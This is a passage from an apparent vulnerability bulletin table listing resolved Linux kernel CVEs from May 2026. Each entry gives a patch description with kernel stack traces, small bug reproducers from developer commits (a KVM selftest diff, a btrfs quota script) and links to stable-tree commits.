flags:0x00080000 [ 862.245024] Workqueue: iscsi_ctrl_3:1 __iscsi_unbind_session [scsi_transport_iscsi] [ 862.245264] Call Trace: [ 862.245587] <TASK> [ 862.245814] __schedule+0x810/0x15c0 [ 862.246557] schedule+0x69/0x180 [ 862.246760] blk_mq_freeze_queue_wait+0xde/0x120 [ 862.247688] elevator_change+0x16d/0x460 [ 862.247893] elevator_set_none+0x87/0xf0 [ 862.248798] blk_unregister_queue+0x12e/0x2a0 [ 862.248995] __del_gendisk+0x231/0x7e0 [ 862.250143] del_gendisk+0x12f/0x1d0 [ 862.250339] sd_remove+0x85/0x130 [sd_mod] [ 862.250650] device_release_driver_internal+0x36d/0x530 [ 862.250849] bus_remove_device+0x1dd/0x3f0 [ 862.251042] device_del+0x38a/0x930 [ 862.252095] __scsi_remove_device+0x293/0x360 [ 862.252291] scsi_remove_target+0x486/0x760 [ 862.252654] __iscsi_unbind_session+0x18a/0x3e0 [scsi_transport_iscsi] [ 862.252886] process_one_work+0x633/0xe50 [ 862.253101] worker_thread+0x6df/0xf10 [ 862.253647] kthread+0x36d/0x720 [ 862.254533] ret_from_fork+0x2a6/0x470 [ 862.255852] ret_from_fork_asm+0x1a/0x30 [ 862.256037] </TASK> Remove the blk_should_fake_timeout() check from dm, as dm has no native timeout handling and should not attempt to fake timeouts. | 2026-05-08 | not yet calculated | CVE-2026-43314 | https://git.kernel.org/stable/c/ece6720de9403260088209b0b92d45e0b49ff856 https://git.kernel.org/stable/c/8200fca818c1e2f65bc6cb16d934ff6049302197 https://git.kernel.org/stable/c/b307b6307f6459841312432bd4bc9519cbac97f5 https://git.kernel.org/stable/c/4f9e7ca933a9fbf9912a384b061a00c77332cbf0 https://git.kernel.org/stable/c/cf2d06c9fd4b6521ea5b7f73c99c64c2c6f5e224 https://git.kernel.org/stable/c/6cdb21e0c9fdee484feba14fc9e72e9d07daf9f3 https://git.kernel.org/stable/c/c8a23d4c995ef4227bd4de64cd3910637ee6162e https://git.kernel.org/stable/c/f3a9c95a15d2f4466acad5c68faeff79ca5e9f47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Remove a user-triggerable WARN on nested_svm_load_cr3() succeeding Drop the WARN in svm_set_nested_state() on nested_svm_load_cr3() failing as it is trivially easy to trigger from userspace by modifying CPUID after loading CR3. E.g. modifying the state restoration selftest like so: --- tools/testing/selftests/kvm/x86/state_test.c +++ tools/testing/selftests/kvm/x86/state_test.c @@ -280,7 +280,16 @@ int main(int argc, char *argv[]) /* Restore state in a new VM. */ vcpu = vm_recreate_with_one_vcpu(vm); - vcpu_load_state(vcpu, state); + + if (stage == 4) { + state->sregs.cr3 = BIT(44); + vcpu_load_state(vcpu, state); + + vcpu_set_cpuid_property(vcpu, X86_PROPERTY_MAX_PHY_ADDR, 36); + __vcpu_nested_state_set(vcpu, &state->nested); + } else { + vcpu_load_state(vcpu, state); + } /* * Restore XSAVE state in a dummy vCPU, first without doing generates: WARNING: CPU: 30 PID: 938 at arch/x86/kvm/svm/nested.c:1877 svm_set_nested_state+0x34a/0x360 [kvm_amd] Modules linked in: kvm_amd kvm irqbypass [last unloaded: kvm] CPU: 30 UID: 1000 PID: 938 Comm: state_test Tainted: G W 6.18.0-rc7-58e10b63777d-next-vm Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:svm_set_nested_state+0x34a/0x360 [kvm_amd] Call Trace: <TASK> kvm_arch_vcpu_ioctl+0xf33/0x1700 [kvm] kvm_vcpu_ioctl+0x4e6/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x61/0xad0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Simply delete the WARN instead of trying to prevent userspace from shoving "illegal" state into CR3. For better or worse, KVM's ABI allows userspace to set CPUID after SREGS, and vice versa, and KVM is very permissive when it comes to guest CPUID. I.e. attempting to enforce the virtual CPU model when setting CPUID could break userspace. Given that the WARN doesn't provide any meaningful protection for KVM or benefit for userspace, simply drop it even though the odds of breaking userspace are minuscule. Opportunistically delete a spurious newline. | 2026-05-08 | not yet calculated | CVE-2026-43315 | https://git.kernel.org/stable/c/155ec243ef726f4bc49536fa0bfb565dc011ab17 https://git.kernel.org/stable/c/580ea57840864d40e019bc13fd26afdc8d510a2f https://git.kernel.org/stable/c/deb8f6dfd31d94b18dbeeaa8c01fbec5fc70fd2b https://git.kernel.org/stable/c/ce904c8a5bbe697eae0f7e34b07095bd7a6dee19 https://git.kernel.org/stable/c/969e5e13ff5c18603f21d1f9f64ec9194e141ac0 https://git.kernel.org/stable/c/ebb2ab4f1c87d6b52776292cf7dc16aea48e95f8 https://git.kernel.org/stable/c/fc3ba56385d03501eb582e4b86691ba378e556f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: solo6x10: Check for out of bounds chip_id Clang with CONFIG_UBSAN_SHIFT=y noticed a condition where a signed type (literal "1" is an "int") could end up being shifted beyond 32 bits, so instrumentation was added (and due to the double is_tw286x() call seen via inlining), Clang decides the second one must now be undefined behavior and elides the rest of the function[1]. This is a known problem with Clang (that is still being worked on), but we can avoid the entire problem by actually checking the existing max chip ID, and now there is no runtime instrumentation added at all since everything is known to be within bounds. Additionally use an unsigned value for the shift to remove the instrumentation even without the explicit bounds checking. [hverkuil: fix checkpatch warning for is_tw286x] | 2026-05-08 | not yet calculated | CVE-2026-43316 | https://git.kernel.org/stable/c/c327192ca26670cf6e588c1eeda66cd2fa97630e https://git.kernel.org/stable/c/0b3dadada2417782a63ce32dae05bafe1c949e3f https://git.kernel.org/stable/c/603e3859393ee2ce91393b7d05e6e56e4b66e5cd https://git.kernel.org/stable/c/33af366211ee78e3b074ff44a16121e537e86826 https://git.kernel.org/stable/c/5849ae68d7b8b6ad55cc1bf0d227dd2ae6362528 https://git.kernel.org/stable/c/d29f33b2cf98e4901cd5457d1ee34062e808df73 https://git.kernel.org/stable/c/4d6db0c6bbbfd8d7bbdbf7ab6a9c003752abf116 https://git.kernel.org/stable/c/0fdf6323c35a134f206dcad5babb4ff488552076 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: core: fix leak on early registration failure A recent commit fixed a resource leak on early registration failures but for some reason left out the first error path which still leaks the resources associated with the interface. Fix up also the first error path so that the interface is always released on errors. | 2026-05-08 | not yet calculated | CVE-2026-43317 | https://git.kernel.org/stable/c/bbfe49ffb892bddf32c34bea95b7ff0fc30affb5 https://git.kernel.org/stable/c/f1ba620f9e8d7291f80c0554e4b820f5fb30e819 https://git.kernel.org/stable/c/5fd4396c2e48e90cc2597a86c18227d56ea845f0 https://git.kernel.org/stable/c/2c198c272f9c9213b0fdf6b4a879f445c574f416 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify Invalidating a dmabuf will impact other users of the shared BO. In the scenario where process A moves the BO, it needs to inform process B about the move and process B will need to update its page table. The commit fixes a synchronisation bug caused by the use of the ticket: it made amdgpu_vm_handle_moved behave as if updating the page table immediately was correct but in this case it's not. An example is the following scenario, with 2 GPUs and glxgears running on GPU0 and Xorg running on GPU1, on a system where P2P PCI isn't supported: glxgears: export linear buffer from GPU0 and import using GPU1 submit frame rendering to GPU0 submit tiled->linear blit Xorg: copy of linear buffer The sequence of jobs would be: drm_sched_job_run # GPU0, frame rendering drm_sched_job_queue # GPU0, blit drm_sched_job_done # GPU0, frame rendering drm_sched_job_run # GPU0, blit move linear buffer for GPU1 access # amdgpu_dma_buf_move_notify -> update pt # GPU0 It this point the blit job on GPU0 is still running and would likely produce a page fault. | 2026-05-08 | not yet calculated | CVE-2026-43318 | https://git.kernel.org/stable/c/82a7ea35a1526bef8ae170c33ff80e5db7728961 https://git.kernel.org/stable/c/89a9389ad70d3c69538e59d87df67d407aef4c26 https://git.kernel.org/stable/c/3307459eb3583115264421e859858d1f90f3694a https://git.kernel.org/stable/c/b18fc0ab837381c1a6ef28386602cd888f2d9edf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: spidev: fix lock inversion between spi_lock and buf_lock The spidev driver previously used two mutexes, spi_lock and buf_lock, but acquired them in different orders depending on the code path: write()/read(): buf_lock -> spi_lock ioctl(): spi_lock -> buf_lock This AB-BA locking pattern triggers lockdep warnings and can cause real deadlocks: WARNING: possible circular locking dependency detected spidev_ioctl() -> mutex_lock(&spidev->buf_lock) spidev_sync_write() -> mutex_lock(&spidev->spi_lock) *** DEADLOCK *** The issue is reproducible with a simple userspace program that performs write() and SPI_IOC_WR_MAX_SPEED_HZ ioctl() calls from separate threads on the same spidev file descriptor. Fix this by simplifying the locking model and removing the lock inversion entirely. spidev_sync() no longer performs any locking, and all callers serialize access using spi_lock. buf_lock is removed since its functionality is fully covered by spi_lock, eliminating the possibility of lock ordering issues. This removes the lock inversion and prevents deadlocks without changing userspace ABI or behaviour. | 2026-05-08 | not yet calculated | CVE-2026-43319 | https://git.kernel.org/stable/c/f8431b8672231d378b03176fe74c95adfd3522cf https://git.kernel.org/stable/c/e341e18215030af2136836b78508e0d798916df7 https://git.kernel.org/stable/c/41ccfac7d302968a4f32b5f7b012d066c5f5cdf8 https://git.kernel.org/stable/c/40534d19ed2afb880ecf202dab26a8e7a5808d16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix dsc eDP issue [why] Need to add function hook check before use | 2026-05-08 | not yet calculated | CVE-2026-43320 | https://git.kernel.org/stable/c/11718976c53a258c4d107aa05d68773379d0006f https://git.kernel.org/stable/c/c10fe9471f3aa352bb9d9329d0b25e28e0672243 https://git.kernel.org/stable/c/0481be9f12d8324789ccebf1e5fd0704b6e3fc99 https://git.kernel.org/stable/c/878a4b73c11111ff5f820730f59a7f8c6fd59374 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/fair: Fix zero_vruntime tracking fix John reported that stress-ng-yield could make his machine unhappy and managed to bisect it to commit b3d99f43c72b ("sched/fair: Fix zero_vruntime tracking"). The combination of yield and that commit was specific enough to hypothesize the following scenario: Suppose we have 2 runnable tasks, both doing yield. Then one will be eligible and one will not be, because the average position must be in between these two entities. Therefore, the runnable task will be eligible, and be promoted a full slice (all the tasks do is yield after all). This causes it to jump over the other task and now the other task is eligible and current is no longer. So we schedule. Since we are runnable, there is no {de,en}queue. All we have is the __{en,de}queue_entity() from {put_prev,set_next}_task(). But per the fingered commit, those two no longer move zero_vruntime. All that moves zero_vruntime are tick and full {de,en}queue. This means, that if the two tasks playing leapfrog can reach the critical speed to reach the overflow point inside one tick's worth of time, we're up a creek. Additionally, when multiple cgroups are involved, there is no guarantee the tick will in fact hit every cgroup in a timely manner. Statistically speaking it will, but that same statistics does not rule out the possibility of one cgroup not getting a tick for a significant amount of time -- however unlikely. Therefore, just like with the yield() case, force an update at the end of every slice. This ensures the update is never more than a single slice behind and the whole thing is within 2 lag bounds as per the comment on entity_key(). | 2026-05-08 | not yet calculated | CVE-2026-43323 | https://git.kernel.org/stable/c/c089147074ed96ff4330739a0559394c19a3dfc8 https://git.kernel.org/stable/c/87573883c30f1a8555ff720836bb6ea231058539 https://git.kernel.org/stable/c/fb61ffb3fb30a161eb5404c27fc7635e275beafd https://git.kernel.org/stable/c/1319ea57529e131822bab56bf417c8edc2db9ae8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: don't send a 6E related command when not supported MCC_ALLOWED_AP_TYPE_CMD is related to 6E support. Do not send it if the device doesn't support 6E. Apparently, the firmware is mistakenly advertising support for this command even on AX201 which does not support 6E and then the firmware crashes. | 2026-05-08 | not yet calculated | CVE-2026-43325 | https://git.kernel.org/stable/c/c0b3fa5e0eaecd38e6a9f8f78e86f468fbde719a https://git.kernel.org/stable/c/6607d0e58ceca997816122568ce54db9e134edab https://git.kernel.org/stable/c/323156c3541e23da7e582008a7ac30cd51b60acd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix SCX_KICK_WAIT deadlock by deferring wait to balance callback SCX_KICK_WAIT busy-waits in kick_cpus_irq_workfn() using smp_cond_load_acquire() until the target CPU's kick_sync advances. Because the irq_work runs in hardirq context, the waiting CPU cannot reschedule and its own kick_sync never advances. If multiple CPUs form a wait cycle, all CPUs deadlock. Replace the busy-wait in kick_cpus_irq_workfn() with resched_curr() to force the CPU through do_pick_task_scx(), which queues a balance callback to perform the wait. The balance callback drops the rq lock and enables IRQs following the sched_core_balance() pattern, so the CPU can process IPIs while waiting. The local CPU's kick_sync is advanced on entry to do_pick_task_scx() and continuously during the wait, ensuring any CPU that starts waiting for us sees the advancement and cannot form cyclic dependencies. | 2026-05-08 | not yet calculated | CVE-2026-43326 | https://git.kernel.org/stable/c/c3a7903f65cf4c7fb0477eb0f8b94f326a47fe54 https://git.kernel.org/stable/c/415cb193bb9736f0e830286c72a6fa8eb2a9cc5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: dummy-hcd: Fix locking/synchronization error Syzbot testing was able to provoke an addressing exception and crash in the usb_gadget_udc_reset() routine in drivers/usb/gadgets/udc/core.c, resulting from the fact that the routine was called with a second ("driver") argument of NULL. The bad caller was set_link_state() in dummy_hcd.c, and the problem arose because of a race between a USB reset and driver unbind. These sorts of races were not supposed to be possible; commit 7dbd8f4cabd9 ("USB: dummy-hcd: Fix erroneous synchronization change"), along with a few followup commits, was written specifically to prevent them. As it turns out, there are (at least) two errors remaining in the code. Another patch will address the second error; this one is concerned with the first. The error responsible for the syzbot crash occurred because the stop_activity() routine will sometimes drop and then re-acquire the dum->lock spinlock. A call to stop_activity() occurs in set_link_state() when handling an emulated USB reset, after the test of dum->ints_enabled and before the increment of dum->callback_usage. This allowed another thread (doing a driver unbind) to sneak in and grab the spinlock, and then clear dum->ints_enabled and dum->driver. Normally this other thread would have to wait for dum->callback_usage to go down to 0 before it would clear dum->driver, but in this case it didn't have to wait since dum->callback_usage had not yet been incremented. The fix is to increment dum->callback_usage _before_ calling stop_activity() instead of after. Then the thread doing the unbind will not clear dum->driver until after the call to usb_gadget_udc_reset() safely returns and dum->callback_usage has been decremented again. | 2026-05-08 | not yet calculated | CVE-2026-43327 | https://git.kernel.org/stable/c/6350c7dd33ab481ef41c931a238361490c32d15c https://git.kernel.org/stable/c/cc97fb5969177cccce2e23b31298df220fc7570d https://git.kernel.org/stable/c/218886b2ef2dea7627d3700ab0abaf4bf9d1161f https://git.kernel.org/stable/c/791966f85b439b261bf19865cf1c07c065ffb4b4 https://git.kernel.org/stable/c/805b1833d6ed6da5086e610578a28e71bb54fbbb https://git.kernel.org/stable/c/efbd9441f1e769a7aae1813d497cec09cbdff031 https://git.kernel.org/stable/c/69ab97a693251d6a6093e630060a3c744fd58524 https://git.kernel.org/stable/c/616a63ff495df12863692ab3f9f7b84e3fa7a66d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: governor: fix double free in cpufreq_dbs_governor_init() error path When kobject_init_and_add() fails, cpufreq_dbs_governor_init() calls kobject_put(&dbs_data->attr_set.kobj). The kobject release callback cpufreq_dbs_data_release() calls gov->exit(dbs_data) and kfree(dbs_data), but the current error path then calls gov->exit(dbs_data) and kfree(dbs_data) again, causing a double free. Keep the direct kfree(dbs_data) for the gov->init() failure path, but after kobject_init_and_add() has been called, let kobject_put() handle the cleanup through cpufreq_dbs_data_release(). | 2026-05-08 | not yet calculated | CVE-2026-43328 | https://git.kernel.org/stable/c/56bc91ee78babe9578585a2bc137abc4b3115ff3 https://git.kernel.org/stable/c/019ea28629720c220daedf38107c8787f330dc05 https://git.kernel.org/stable/c/da39ee627fd82b52068d4d5f115749a8b7d271f9 https://git.kernel.org/stable/c/427d048e4f6acbfa01b5a8062449fe0ee8987c0d https://git.kernel.org/stable/c/d2703b4f8fb7cc6f0dfdb2dc2359cc46189e7357 https://git.kernel.org/stable/c/3bf9d023d2329a0e5379f2fd09d06ef09729cd9d https://git.kernel.org/stable/c/6dcf9d0064ce2f3e3dfe5755f98b93abe6a98e1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: Disable KCOV instrumentation after load_segments() The load_segments() function changes segment registers, invalidating GS base (which KCOV relies on for per-cpu data). When CONFIG_KCOV is enabled, any subsequent instrumented C code call (e.g. native_gdt_invalidate()) begins crashing the kernel in an endless loop. To reproduce the problem, it's sufficient to do kexec on a KCOV-instrumented kernel: $ kexec -l /boot/otherKernel $ kexec -e The real-world context for this problem is enabling crash dump collection in syzkaller. For this, the tool loads a panic kernel before fuzzing and then calls makedumpfile after the panic. This workflow requires both CONFIG_KEXEC and CONFIG_KCOV to be enabled simultaneously. Adding safeguards directly to the KCOV fast-path (__sanitizer_cov_trace_pc()) is also undesirable as it would introduce an extra performance overhead. Disabling instrumentation for the individual functions would be too fragile, so disable KCOV instrumentation for the entire machine_kexec_64.c and physaddr.c. If coverage-guided fuzzing ever needs these components in the future, other approaches should be considered. The problem is not relevant for 32 bit kernels as CONFIG_KCOV is not supported there. [ bp: Space out comment for better readability. ] | 2026-05-08 | not yet calculated | CVE-2026-43331 | https://git.kernel.org/stable/c/1e3e98596c2769721ade0418434852fb3af4849a https://git.kernel.org/stable/c/de05c66fab8847237a9ca216934e56d3ee837f08 https://git.kernel.org/stable/c/917e3ad3321e75ca0223d5ccf26ceda116aa51e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: reject direct access to nullable PTR_TO_BUF pointers check_mem_access() matches PTR_TO_BUF via base_type() which strips PTR_MAYBE_NULL, allowing direct dereference without a null check. Map iterator ctx->key and ctx->value are PTR_TO_BUF | PTR_MAYBE_NULL. On stop callbacks these are NULL, causing a kernel NULL dereference. Add a type_may_be_null() guard to the PTR_TO_BUF branch, matching the existing PTR_TO_BTF_ID pattern. | 2026-05-08 | not yet calculated | CVE-2026-43333 | https://git.kernel.org/stable/c/10bc4a4dcded509c5d5c67d497900c3922c604cd https://git.kernel.org/stable/c/21a10c06ffae24cb01fd174a7ab7736001d2ea56 https://git.kernel.org/stable/c/8755066f7bd0f4ac46a29d1708c7b20894539252 https://git.kernel.org/stable/c/70abd9d118da2f56beb4ec22e3a29becae373535 https://git.kernel.org/stable/c/63276547debc4d8a73eefb2c5273b2a905c961b0 https://git.kernel.org/stable/c/4f6c99dc0420f1a3d671c1b8ab8a7ac84d9cba09 https://git.kernel.org/stable/c/b0db1accbc7395657c2b79db59fa9fae0d6656f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: interconnect: qcom: sm8450: Fix NULL pointer dereference in icc_link_nodes() The change to dynamic IDs for SM8450 platform interconnects left two links unconverted, fix it to avoid the NULL pointer dereference in runtime, when a pointer to a destination interconnect is not valid: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 <...> Call trace: icc_link_nodes+0x3c/0x100 (P) qcom_icc_rpmh_probe+0x1b4/0x528 platform_probe+0x64/0xc0 really_probe+0xc4/0x2a8 __driver_probe_device+0x80/0x140 driver_probe_device+0x48/0x170 __device_attach_driver+0xc0/0x148 bus_for_each_drv+0x88/0xf0 __device_attach+0xb0/0x1c0 device_initial_probe+0x58/0x68 bus_probe_device+0x40/0xb8 deferred_probe_work_func+0x90/0xd0 process_one_work+0x15c/0x3c0 worker_thread+0x2e8/0x400 kthread+0x150/0x208 ret_from_fork+0x10/0x20 Code: 900310f4 911d6294 91008280 94176078 (f94002a0) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: Oops: Fatal exception | 2026-05-08 | not yet calculated | CVE-2026-43335 | https://git.kernel.org/stable/c/77d22bf3fc5d1bcdee035979b07840c9c2ece8f2 https://git.kernel.org/stable/c/dbbd550d7c8d90d3af9fe8a12a9caff077ddb8e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix NULL pointer dereference in dcn401_init_hw() dcn401_init_hw() assumes that update_bw_bounding_box() is valid when entering the update path. However, the existing condition: ((!fams2_enable && update_bw_bounding_box) || freq_changed) does not guarantee this, as the freq_changed branch can evaluate to true independently of the callback pointer. This can result in calling update_bw_bounding_box() when it is NULL. Fix this by separating the update condition from the pointer checks and ensuring the callback, dc->clk_mgr, and bw_params are validated before use. Fixes the below: ../dc/hwss/dcn401/dcn401_hwseq.c:367 dcn401_init_hw() error: we previously assumed 'dc->res_pool->funcs->update_bw_bounding_box' could be null (see line 362) (cherry picked from commit 86117c5ab42f21562fedb0a64bffea3ee5fcd477) | 2026-05-08 | not yet calculated | CVE-2026-43337 | https://git.kernel.org/stable/c/10c13c111d0d7f8e101c742feff264fc98e3f9f7 https://git.kernel.org/stable/c/2d4a6f0702c5211e0be8b688c5fc24f082ec74d6 https://git.kernel.org/stable/c/e927b36ae18b66b49219eaa9f46edc7b4fdbb25e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: reserve enough transaction items for qgroup ioctls Currently our qgroup ioctls don't reserve any space, they just do a transaction join, which does not reserve any space, neither for the quota tree updates nor for the delayed refs generated when updating the quota tree. The quota root uses the global block reserve, which is fine most of the time since we don't expect a lot of updates to the quota root, or to be too close to -ENOSPC such that other critical metadata updates need to resort to the global reserve. However this is not optimal, as not reserving proper space may result in a transaction abort due to not reserving space for delayed refs and then abusing the use of the global block reserve. For example, the following reproducer (which is unlikely to model any real world use case, but just to illustrate the problem), triggers such a transaction abort due to -ENOSPC when running delayed refs: $ cat test.sh #!/bin/bash DEV=/dev/nullb0 MNT=/mnt/nullb0 umount $DEV &> /dev/null # Limit device to 1G so that it's much faster to reproduce the issue. mkfs.btrfs -f -b 1G $DEV mount -o commit=600 $DEV $MNT fallocate -l 800M $MNT/filler btrfs quota enable $MNT for ((i = 1; i <= 400000; i++)); do btrfs qgroup create 1/$i $MNT done umount $MNT When running this, we can see in dmesg/syslog that a transaction abort happened: [436.490] BTRFS error (device nullb0): failed to run delayed ref for logical 30408704 num_bytes 16384 type 176 action 1 ref_mod 1: -28 [436.493] ------------[ cut here ]------------ [436.494] BTRFS: Transaction aborted (error -28) [436.495] WARNING: fs/btrfs/extent-tree.c:2247 at btrfs_run_delayed_refs+0xd9/0x110 [btrfs], CPU#4: umount/2495372 [436.497] Modules linked in: btrfs loop (...) [436.508] CPU: 4 UID: 0 PID: 2495372 Comm: umount Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [436.510] Tainted: [W]=WARN [436.511] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [436.513] RIP: 0010:btrfs_run_delayed_refs+0xdf/0x110 [btrfs] [436.514] Code: 0f 82 ea (...) [436.518] RSP: 0018:ffffd511850b7d78 EFLAGS: 00010292 [436.519] RAX: 00000000ffffffe4 RBX: ffff8f120dad37e0 RCX: 0000000002040001 [436.520] RDX: 0000000000000002 RSI: 00000000ffffffe4 RDI: ffffffffc090fd80 [436.522] RBP: 0000000000000000 R08: 0000000000000001 R09: ffffffffc04d1867 [436.523] R10: ffff8f18dc1fffa8 R11: 0000000000000003 R12: ffff8f173aa89400 [436.524] R13: 0000000000000000 R14: ffff8f173aa89400 R15: 0000000000000000 [436.526] FS: 00007fe59045d840(0000) GS:ffff8f192e22e000(0000) knlGS:0000000000000000 [436.527] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [436.528] CR2: 00007fe5905ff2b0 CR3: 000000060710a002 CR4: 0000000000370ef0 [436.530] Call Trace: [436.530] <TASK> [436.530] btrfs_commit_transaction+0x73/0xc00 [btrfs] [436.531] ? btrfs_attach_transaction_barrier+0x1e/0x70 [btrfs] [436.532] sync_filesystem+0x7a/0x90 [436.533] generic_shutdown_super+0x28/0x180 [436.533] kill_anon_super+0x12/0x40 [436.534] btrfs_kill_super+0x12/0x20 [btrfs] [436.534] deactivate_locked_super+0x2f/0xb0 [436.534] cleanup_mnt+0xea/0x180 [436.535] task_work_run+0x58/0xa0 [436.535] exit_to_user_mode_loop+0xed/0x480 [436.536] ? __x64_sys_umount+0x68/0x80 [436.536] do_syscall_64+0x2a5/0xf20 [436.537] entry_SYSCALL_64_after_hwframe+0x76/0x7e [436.537] RIP: 0033:0x7fe5906b6217 [436.538] Code: 0d 00 f7 (...) [436.540] RSP: 002b:00007ffcd87a61f8 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6 [436.541] RAX: 0000000000000000 RBX: 00005618b9ecadc8 RCX: 00007fe5906b6217 [436.541] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00005618b9ecb100 [436.542] RBP: 0000000000000000 R08: 00007ffcd87a4fe0 R09: 00000000ffffffff [436.544] R10: 0000000000000103 R11: ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43338 | https://git.kernel.org/stable/c/bb6eb33c908edbbb4d92abdc0c6c87f21b4952e8 https://git.kernel.org/stable/c/cf930a651eef6f8d915bf0ccd60c2045974f870c https://git.kernel.org/stable/c/386f5e16a383101a68e195c806b4eedb233cd1d3 https://git.kernel.org/stable/c/f9a4e3015db1aeafbef407650eb8555445ca943e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: Reinit dev->spinlock between attachments to low-level drivers `struct comedi_device` is the main controlling structure for a COMEDI device created by the COMEDI subsystem. It contains a member `spinlock` containing a spin-lock that is initialized by the COMEDI subsystem, but is reserved for use by a low-level driver attached to the COMEDI device (at least since commit 25436dc9d84f ("Staging: comedi: remove RT code")). Some COMEDI devices (those created on initialization of the COMEDI subsystem when the "comedi.comedi_num_legacy_minors" parameter is non-zero) can be attached to different low-level drivers over their lifetime using the `COMEDI_DEVCONFIG` ioctl command. This can result in inconsistent lock states being reported when there is a mismatch in the spin-lock locking levels used by each low-level driver to which the COMEDI device has been attached. Fix it by reinitializing `dev->spinlock` before calling the low-level driver's `attach` function pointer if `CONFIG_LOCKDEP` is enabled. | 2026-05-08 | not yet calculated | CVE-2026-43340 | https://git.kernel.org/stable/c/3181c34b415c5464be9d34bff3e43ef63b747039 https://git.kernel.org/stable/c/2b1f49e4fdff3ef0f8e9158bbb5b149e06287560 https://git.kernel.org/stable/c/4d5ffe524903a30e2e0da7d16841a56bec2de55c https://git.kernel.org/stable/c/c01bcc67a9a692d65508ebd480405b5e77d562b7 https://git.kernel.org/stable/c/430291d8f3884f57ae0057049b0ca291453e29e1 https://git.kernel.org/stable/c/b89c026227712c367950bbae055a5b31073d3b30 https://git.kernel.org/stable/c/83134a7a176ce5b4b19b6edecf4360e8d98d1a5a https://git.kernel.org/stable/c/4b9a9a6d71e3e252032f959fb3895a33acb5865c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_rndis: Protect RNDIS options with mutex The class/subclass/protocol options are suspectible to race conditions as they can be accessed concurrently through configfs. Use existing mutex to protect these options. This issue was identified during code inspection. | 2026-05-08 | not yet calculated | CVE-2026-43342 | https://git.kernel.org/stable/c/0a75d97c53477a59c0aa1c65f69038c719f9c5b8 https://git.kernel.org/stable/c/c1b3d5b0acb194efe20fc5864ee03439fa7bd45c https://git.kernel.org/stable/c/65b7dbf80a1627667c241fff7c1c224f3118014f https://git.kernel.org/stable/c/cb5316b37288ab8791584e32f114c4f41ad45b67 https://git.kernel.org/stable/c/7d8fa3b8783ab95a46e20d97fbeeede719b2efda https://git.kernel.org/stable/c/446f1842cda929c40d4697722bfdcfb334bc9692 https://git.kernel.org/stable/c/209decd3f7901df9842b83f2540dc8685e344a07 https://git.kernel.org/stable/c/8d8c68b1fc06ece60cf43e1306ff0f4ac121547e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_subset: Fix unbalanced refcnt in geth_free geth_alloc() increments the reference count, but geth_free() fails to decrement it. This prevents the configuration of attributes via configfs after unlinking the function. Decrement the reference count in geth_free() to ensure proper cleanup. | 2026-05-08 | not yet calculated | CVE-2026-43343 | https://git.kernel.org/stable/c/a932b171554714b1bca313b853c7aa9f2930f9aa https://git.kernel.org/stable/c/d7d702407b61e96286a15b6e715572f541a8d41c https://git.kernel.org/stable/c/3f5bfc550a40d7493b1cf09540ed6b412b3b82be https://git.kernel.org/stable/c/75776a055b656873319c3830fed471daef3ceb23 https://git.kernel.org/stable/c/cc8ec610cd14c093a19371691a7ce1ee5421e829 https://git.kernel.org/stable/c/3d436670b47415da042452618fb5d8e317ab095f https://git.kernel.org/stable/c/23e4851ce348a329d974e84e828155dda9f52122 https://git.kernel.org/stable/c/caa27923aacd8a5869207842f2ab1657c6c0c7bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Fix die ID init and look up bugs In snbep_pci2phy_map_init(), in the nr_node_ids > 8 path, uncore_device_to_die() may return -1 when all CPUs associated with the UBOX device are offline. Remove the WARN_ON_ONCE(die_id == -1) check for two reasons: - The current code breaks out of the loop. This is incorrect because pci_get_device() does not guarantee iteration in domain or bus order, so additional UBOX devices may be skipped during the scan. - Returning -EINVAL is incorrect, since marking offline buses with die_id == -1 is expected and should not be treated as an error. Separately, when NUMA is disabled on a NUMA-capable platform, pcibus_to_node() returns NUMA_NO_NODE, causing uncore_device_to_die() to return -1 for all PCI devices. As a result, spr_update_device_location(), used on Intel SPR and EMR, ignores the corresponding PMON units and does not add them to the RB tree. Fix this by using uncore_pcibus_to_dieid(), which retrieves topology from the UBOX GIDNIDMAP register and works regardless of whether NUMA is enabled in Linux. This requires snbep_pci2phy_map_init() to be added in spr_uncore_pci_init(). Keep uncore_device_to_die() only for the nr_node_ids > 8 case, where NUMA is expected to be enabled. | 2026-05-08 | not yet calculated | CVE-2026-43344 | 